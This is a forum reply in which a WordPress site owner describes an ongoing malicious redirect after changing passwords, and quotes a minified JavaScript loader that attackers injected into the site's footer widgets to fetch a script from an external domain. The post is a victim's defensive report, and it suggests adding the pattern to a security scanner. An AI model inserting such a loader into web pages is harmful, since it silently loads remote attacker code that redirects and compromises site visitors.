Hi Peter, thanks for replying.
Yes, I have updated the server password, database, and admin user with a typical password pattern like this: xY$w*>939dIb$Yq^%9xBHK8EP (I think it’s strong enough, lol). I even added .htpasswd for my Wp Admin. So, I thought that everything was all cleaned up. But the redirect still exists.
I tried to investigate my website again, and I found that they inserted a script calling external js like the following into my footer widgets (I found this by direct search to my db)
(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,’script’,’https://circuspride.org/7PqtTryV’);
And this external script calling is not detected by wpfence db scan. (Maybe you want to add this to the search pattern of wpfence)
I will monitor my website for a while. If anything else happens, I will update this post.
-
This reply was modified 2 years, 5 months ago by storm99.
